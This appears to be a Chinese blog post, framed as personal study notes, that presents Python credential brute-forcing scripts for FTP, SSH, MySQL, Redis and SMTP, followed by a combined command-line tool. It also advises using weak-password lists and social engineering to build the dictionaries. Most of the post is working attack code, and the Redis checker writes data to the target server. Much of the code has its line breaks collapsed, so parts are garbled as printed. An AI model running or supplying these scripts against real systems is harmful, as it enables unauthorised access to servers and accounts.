3、安全开发-Python-协议库爆破FTPSSHRedisMYSQLSMTP等

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前言:

一、Python-文件传输爆破-ftplib库操作ftp协议 

1、关键代码解释:

2、完整代码: 

二、Python-登录爆破-paramiko库操作ssh协议

1、关键代码解释:

2、完整代码: 

三、Python-数据库爆破-pymysqlj库操作mysql协议

1、关键代码解释:

2、完整代码: 

四、Python-数据库爆破-redis库操作redist协议

1、关键代码解释:

2、完整代码:

五、Python-邮件爆破-smtplib库操作smtp协议

1、关键代码解释:

2、完整代码: 

六、整合五种协议爆破完整脚本

前言:

原理:python的一些库支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。

一、Python-文件传输爆破-ftplib库操作ftp协议 

FTP服务默认端口:21

1、关键代码解释:

from ftplib import FTPftp = FTP()
ftp.connect(ip, 21)  #连接ftp服务器ip和端口
ftp.login(username,password) #尝试用户名和密码远程登录

2、完整代码: 

from ftplib import FTP
import osdef ftp_check(ip,username,password):ftp = FTP()print('check->'+ip+'|'+username+'|'+password)try:ftp.connect(ip, 21)ftp.login(username,password)print('success')exit()except Exception as e:print('failed')if __name__ == '__main__':pypath = os.getcwd()  #当前工作目录ip=input('please input ftp ip:')#注意修改自己字典的存放目录for username in open(pypath+'/dic/ftp_username.txt'):username=username.replace('\n','')for password in open(pypath+'/dic/ftp_password.txt'):password=password.replace('\n','')ftp_check(ip,username,password)

二、Python-登录爆破-paramiko库操作ssh协议

ssh服务默认端口:22

1、关键代码解释:

import paramiko#获取SSH客户端对象
ssh = paramiko.SSHClient()
# 允许连接不在know_hosts文件中的主机
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 
#使用用户名和密码远程连接
ssh.connect(ip,"22",username,password)

2、完整代码: 

import paramiko,osdef ssh_check(ip,username,password):print('check->' + ip + '|' + username + '|' + password)ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())try:ssh.connect(ip,"22",username,password)print('success')exit()except Exception as e:print('failed')if __name__ == '__main__':pypath = os.getcwd() #当前工作目录ip = input('please input ssh ip:')#注意修改自己字典的存放目录for username in open(pypath + '/dic/ssh_username.txt'):username = username.replace('\n', '')for password in open(pypath + '/dic/ssh_password.txt'):password = password.replace('\n', '')ssh_check(ip,username,password)

三、Python-数据库爆破-pymysqlj库操作mysql协议

mysql服务默认端口:3306

1、关键代码解释:

import pymysql#远程连接Myql服务
conn_obj = pymysql.connect( host=ip,  # MySQL服务端的IP地址port=3306,  # MySQL默认PORT地址(端口号)user=username,  # 用户名password=password,  # 密码,也可以简写为passwddatabase='mysql',  # 库名称,也可以简写为dbcharset='utf8'  # 字符编码)

2、完整代码: 

import pymysql,osdef mysql_check(ip,username,password):print('check->' + ip + '|' + username + '|' + password)try:conn_obj = pymysql.connect(host=ip,  port=3306, user=username, password=password, database='mysql',charset='utf8')print('success')exit()except Exception as e:passif __name__ == '__main__':pypath = os.getcwd() #当前工作目录ip = input('please input ssh ip:')#注意修改自己字典的存放目录for username in open(pypath + '/dic/mysql_username.txt'):username = username.replace('\n', '')for password in open(pypath + '/dic/mysql_password.txt'):password = password.replace('\n', '')mysql_check(ip,username,password)

四、Python-数据库爆破-redis库操作redist协议

redis服务默认端口:6379,远程登录不需要账号,只要密码

1、关键代码解释:

import redis#远程连接redis服务
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
redis_conn.set('test', 'laowang') #存入键,测试密码是否正确,若错误则存入失败报错

2、完整代码:

import redis,osdef redis_check(ip,password):print('check->' + ip + '|' + password)try:redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)redis_conn.set('test', 'laowang')print('success')exit()except Exception as e:passif __name__ == '__main__':pypath = os.getcwd() #当前工作目录ip = input('please input ssh ip:')#注意修改字典所在目录for password in open(pypath + '/dic/redis_password.txt'):password = password.replace('\n', '')redis_check(ip, password)

五、Python-邮件爆破-smtplib库操作smtp协议

smtp服务默认端口:25

1、关键代码解释:

import smtplib
#获取smtp客户端对象
smtpObj = smtplib.SMTP()
#远程连接SMTP服务, 25 为 SMTP 端口号
smtpObj.connect('smtp.'+ip, 25)
#用户名和密码尝试登录
smtpObj.login(username, password)

2、完整代码: 

import smtplib,osdef email_check(ip,username,password):print('check->' + ip + '|' +username+'|'+ password)try:smtpObj = smtplib.SMTP()smtpObj.connect('smtp.'+ip, 25) smtpObj.login(username, password)print('ok')exit()except smtplib.SMTPException:print("Error")if __name__ == '__main__':pypath = os.getcwd() #当前工作目录#注意修改字典所在目录for username in open(pypath + '/dic/email_username.txt'):username = username.replace('\n', '')ip=username.split('@')[1]for password in open(pypath + '/dic/email_password.txt'):password = password.replace('\n', '')email_check(ip, username, password)

六、整合五种协议爆破完整脚本

from ftplib import FTP
import paramiko
import pymysql
import redis
import smtplib
import os,sysdef ftp_check(ip,username,password):ftp = FTP()print('check->'+ip+'|'+username+'|'+password)try:ftp.connect(ip, 21)ftp.login(username,password)print('success')exit()except Exception as e:print('failed')def ssh_check(ip,username,password):print('check->' + ip + '|' + username + '|' + password)ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())try:ssh.connect(ip,"22",username,password)print('success')exit()except Exception as e:print('failed')def mysql_check(ip,username,password):print('check->' + ip + '|' + username + '|' + password)try:conn_obj = pymysql.connect(host=ip,  # MySQL服务端的IP地址port=3306,  # MySQL默认PORT地址(端口号)user=username,  # 用户名password=password,  # 密码,也可以简写为passwddatabase='mysql',  # 库名称,也可以简写为dbcharset='utf8'  # 字符编码)print('success')exit()except Exception as e:passdef redis_check(ip,password):print('check->' + ip + '|' + password)try:redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)redis_conn.set('test', 'xiaodi')print('success')exit()except Exception as e:passdef email_check(ip,username,password):print('check->' + ip + '|' +username+'|'+ password)try:smtpObj = smtplib.SMTP()smtpObj.connect('smtp.'+ip, 25)  # 25 为 SMTP 端口号smtpObj.login(username, password)print('ok')exit()except smtplib.SMTPException:print("Error")if __name__ == '__main__':pypath = os.getcwd()print('eg:固定字典使用说明:')print('python all.py ftp 127.0.0.1')print('python all.py ssh 127.0.0.1')print('python all.py redis 127.0.0.1')print('python all.py mysql 127.0.0.1')print('python all.py email')print('eg:自定义字典使用说明:')print('python all.py ftp 127.0.0.1 user.txt pass.txt')print('python all.py ssh 127.0.0.1 user.txt pass.txt')print('python all.py redis 127.0.0.1 user.txt pass.txt')print('python all.py mysql 127.0.0.1 user.txt pass.txt')print('python all.py email user.txt pass.txt')xy=sys.argv[1]ip=sys.argv[2]zidian = sys.argv[3]zidian2=sys.argv[4]#没有设置自定义字典,采用固定字典if len(zidian)==0:if xy=='ftp':for username in open(pypath + '/conf/dic_username_ftp.txt'):username = username.replace('\n', '')for password in open(pypath + '/conf/dic_password_ftp.txt'):password = password.replace('\n', '')ftp_check(ip, username, password)elif xy=='ssh':for username in open(pypath + '/conf/dic_username_ssh.txt'):username = username.replace('\n', '')for password in open(pypath + '/conf/dic_password_ssh.txt'):password = password.replace('\n', '')ssh_check(ip, username, password)elif xy=='mysql':for username in open(pypath + '/conf/dic_username_mysql.txt'):username = username.replace('\n', '')for password in open(pypath + '/conf/dic_password_mysql.txt'):password = password.replace('\n', '')mysql_check(ip, username, password)elif xy=='redis':for password in open(pypath + '/conf/dic_password_redis.txt'):password = password.replace('\n', '')redis_check(ip, password)elif xy=='email':for username in open(pypath + '/conf/dic_username_email.txt'):username = username.replace('\n', '')ip = username.split('@')[1]for password in open(pypath + '/conf/dic_password_email.txt'):password = password.replace('\n', '')email_check(ip, username, password)#设置了自定义字典,自定义字典爆破(代码只修改的ftp)else:if xy=='ftp':for username in open(pypath +'\\'+ zidian):username = username.replace('\n', '')for password in open(pypath +'\\'+ zidian2):password = password.replace('\n', '')ftp_check(ip, username, password)elif xy=='ssh':for username in open(pypath + '/conf/dic_username_ssh.txt'):username = username.replace('\n', '')for password in open(pypath + '/conf/dic_password_ssh.txt'):password = password.replace('\n', '')ssh_check(ip, username, password)elif xy=='mysql':for username in open(pypath + '/conf/dic_username_mysql.txt'):username = username.replace('\n', '')for password in open(pypath + '/conf/dic_password_mysql.txt'):password = password.replace('\n', '')mysql_check(ip, username, password)elif xy=='redis':for password in open(pypath + '/conf/dic_password_redis.txt'):password = password.replace('\n', '')redis_check(ip, password)elif xy=='email':for username in open(pypath + '/conf/dic_username_email.txt'):username = username.replace('\n', '')ip = username.split('@')[1]for password in open(pypath + '/conf/dic_password_email.txt'):password = password.replace('\n', '')email_check(ip, username, password)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/668243.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vue全家桶之状态管理Pinia

vue全家桶之状态管理Pinia

一、Pinia和Vuex的对比 1.什么是Pinia呢? Pinia(发音为/piːnjʌ/,如英语中的“peenya”)是最接近pia(西班牙语中的菠萝)的词; Pinia开始于大概2019年,最初是作为一个实验为Vue重新…
阅读更多...
【目标跟踪】相机运动补偿

【目标跟踪】相机运动补偿

文章目录 一、前言二、简介三、改进思路3.1、状态定义3.2、相机运动补偿3.3、iou和ReID融合3.4、改进总结 四、相机运动补偿 一、前言 目前 MOT (Multiple Object Tracking) 最有效的方法仍然是 Tracking-by-detection。今天给大家分享一篇论文 BoT-SORT。论文地址 &#xff0…
阅读更多...
C#学习(十二)——Linq

C#学习(十二)——Linq

一、Linq Language-Integrated Query 语言集成查询 对内存中数据、关系数据和XML数据执行的查询进行检查 例如,在不使用Linq语法时,想要实现查看C盘windows文件夹下最大的前五个文件 class Program {static void Main(string[] args){//实现文件排序功能…
阅读更多...
【力扣 51】N 皇后(回溯+剪枝+深度优先搜索)

【力扣 51】N 皇后(回溯+剪枝+深度优先搜索)

按照国际象棋的规则,皇后可以攻击与之处在同一行或同一列或同一斜线上的棋子。 n 皇后问题 研究的是如何将 n 个皇后放置在 nn 的棋盘上,并且使皇后彼此之间不能相互攻击。 给你一个整数 n ,返回所有不同的 n 皇后问题 的解决方案。 每一种…
阅读更多...
【数据结构与算法】(3)基础数据结构 之 链表 单向链表、双向链表、循环链表详细示例讲解

【数据结构与算法】(3)基础数据结构 之 链表 单向链表、双向链表、循环链表详细示例讲解

目录 2.2 链表1) 概述2) 单向链表3) 单向链表(带哨兵)4) 双向链表(带哨兵)5) 环形链表(带哨兵) 2.2 链表 1) 概述 定义 在计算机科学中,链表是数据元素的线性集合,其每个元素都指…
阅读更多...
Rust 本地文档的使用:rustup doc

Rust 本地文档的使用:rustup doc

Rust 是一种系统级编程语言,以其安全性、速度和内存控制能力而闻名。为了方便开发者更好地了解并利用 Rust 标准库和工具链中的功能,Rust 提供了一种内置的文档浏览方式——通过 rustup doc 命令。 安装 rustup 在查阅 Rust 文档之前,确保你…
阅读更多...
蓝桥杯刷题--python-1

蓝桥杯刷题--python-1

0门牌制作 - 蓝桥云课 (lanqiao.cn) import os import sys # 请在此输入您的代码 res0 for i in range (1,2021): xstr(i) resx.count(2) print(res) 0卡片 - 蓝桥云课 (lanqiao.cn) import os import sys # 请在此输入您的代码 res_10 for i in range(1,99999999999999999): r…
阅读更多...
platfrom tree架构下实现3-Wire驱动(DS1302)

platfrom tree架构下实现3-Wire驱动(DS1302)

目录 概述 1 认识DS1302 1.1 DS1302 硬件电路 1.2 操作DS1302 1.3 注意要点 2 IO引脚位置 3 添加驱动节点 3.1 更新内核.dts 3.2 更新板卡.dtb 4 驱动程序实现 4.1 编写驱动程序 4.2 编写驱动程序的Makefile 4.3 安装驱动程序 5 验证驱动程序 5.1 编写测试程序…
阅读更多...
何时以及如何选择制动电阻

何时以及如何选择制动电阻

制动电阻的选择是优化变频器应用的关键因素 制动电阻器在变频器中是如何工作的? 制动电阻器在 VFD 应用中的工作原理是将电机减速到驱动器设定的精确速度。它们对于电机的快速减速特别有用。制动电阻还可以将任何多余的能量馈入 VFD,以提升直流母线上的…
阅读更多...
Electron实战(二):将Node.js和UI能力(app/BrowserWindow/dialog)等注入html

Electron实战(二):将Node.js和UI能力(app/BrowserWindow/dialog)等注入html

文章目录 设置webPreferences参数安装electron/remotemain进程中初始化html中使用dialog踩坑参考文档 上一篇:Electron实战(一):环境搭建/Hello World/打包exe 设置webPreferences参数 为了能够在html/js中访问Node.js提供fs等模块,需要在n…
阅读更多...
新概念英语第二册(54)

新概念英语第二册(54)

【New words and expressions】生词和短语(14) sticky adj. 粘的 finger n. 手指 pie n. 馅饼 mix v. 混合,拌和 pastr…
阅读更多...
踩坑实录(First Day)

踩坑实录(First Day)

2023 年一整年感觉我的进步都很小,所以自 2024 年起,我将专门开设专栏记录自己在工作期间踩过的所有坑,一来是为了有个记录,自己不会再踩,而来也是为了跟大家做一个分享,与大家进行讨论,提升自己…
阅读更多...
力扣宝石补给

力扣宝石补给

欢迎各位勇者来到力扣新手村,在开始试炼之前,请各位勇者先进行「宝石补给」。 每位勇者初始都拥有一些能量宝石, gem[i] 表示第 i 位勇者的宝石数量。现在这些勇者们进行了一系列的赠送,operations[j] [x, y] 表示在第 j 次的赠送…
阅读更多...
QT 范例阅读:系统托盘 The System Tray Icon example

QT 范例阅读:系统托盘 The System Tray Icon example

main.cpp QApplication app(argc, argv);//判断系统是否支持 系统托盘功能if (!QSystemTrayIcon::isSystemTrayAvailable()) {QMessageBox::critical(0, QObject::tr("Systray"),QObject::tr("I couldnt detect any system tray ""on this system.&qu…
阅读更多...
利用jmeter完成简单的压力测试

利用jmeter完成简单的压力测试

Jmeter是一个非常好用的压力测试工具。Jmeter用来做轻量级的压力测试,非常合适,只需要十几分钟,就能把压力测试需要的脚本写好。 1、什么是压力测试 顾名思义:压力测试,就是 被测试的系统,在一定的访问压…
阅读更多...
下载、安装Jenkins

下载、安装Jenkins

进入官网 下载Jenkins https://www.jenkins.io 直接点击Download 一般是下长期支持版 因为它是java写的,你要运行它(Jenkins.war)肯定要有java环境 有两种方式去运行它,一种是下载Tomcat(是很经典的java容器或者jav…
阅读更多...
代码随想录day16 Java版 二叉树部分

代码随想录day16 Java版 二叉树部分

404.左叶子之和 感觉就是遍历,遇到叶子结点就累加,试了下居然过了 class Solution {int sum 0;public int sumOfLeftLeaves(TreeNode root) {add(root);return sum;}void add(TreeNode root){if (root null) return;if (root.left ! null &&…
阅读更多...
linux编译ffmpeg动态库

linux编译ffmpeg动态库

1,获取源码:git clone https://git.ffmpeg.org/ffmpeg.git 2,创建编译目录,并编译、安装, cd ffmpeg mkdir build cd build ../configure --prefix~/ffmpeg --enable-shared --enable-debug1 //configure后需要使…
阅读更多...
深入探索C++ Move语义:现代编程中的性能革命

深入探索C++ Move语义:现代编程中的性能革命

1. 引言 介绍C中的Move语义 Move语义是C11中引入的一个重要特性,它为C编程语言带来了显著的性能改进。在这之前,C只支持拷贝语义,即通过拷贝构造函数和拷贝赋值操作符来复制对象。Move语义通过允许"移动"而非"拷贝"资源…
阅读更多...
Git版本管理工具(基础):这一篇基本能满足Git基本的使用需求了!

Git版本管理工具(基础):这一篇基本能满足Git基本的使用需求了!

文章目录 Git01-什么是Git作用 02-使用Git03-Git仓库创建 04-Git的三个区域三个区域 05-Git文件状态06-Git暂存区使用07-Git回退版本08-删除文件 Git 01-什么是Git 答:他是一个免费开源的,分布式代码版本控制系统,帮助开发团队维护代码 作用…
阅读更多...
最新文章

Copyright @ 2022~2023